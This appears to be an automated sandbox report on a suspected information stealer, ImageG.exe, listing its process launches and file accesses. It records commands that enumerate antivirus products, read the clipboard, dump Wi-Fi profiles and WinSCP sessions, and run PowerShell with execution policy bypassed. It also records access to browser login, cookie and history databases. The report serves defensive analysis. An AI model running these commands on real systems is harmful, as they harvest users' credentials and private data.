        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /PID 9048 /FJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process where processid=7896 get ExecutablePath
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe NET SESSION
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 SESSION
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /PID 9048 /FJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "c:\users\user\appdata\local\temp\2umc3lagtb9vwbjfvr15mhcztwv\imageg.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\desenamoreis" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "c:\users\user\appdata\local\temp\2umc3lagtb9vwbjfvr15mhcztwv\imageg.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-us --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell -command "get-ciminstance -namespace root/securitycenter2 -classname antivirusproduct | format-list displayname, instanceguid, pathtosignedproductexe, pathtosignedreportingexe, productstate, timestamp""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "c:\users\user\appdata\local\temp\2umc3lagtb9vwbjfvr15mhcztwv\imageg.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\desenamoreis" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "c:\users\user\appdata\local\temp\2umc3lagtb9vwbjfvr15mhcztwv\imageg.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-us --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell -command "get-ciminstance -namespace root/securitycenter2 -classname antivirusproduct | format-list displayname, instanceguid, pathtosignedproductexe, pathtosignedreportingexe, productstate, timestamp""Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\ImageG.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\CURRENT VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOCK VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite VolumeInformationJump to behavior
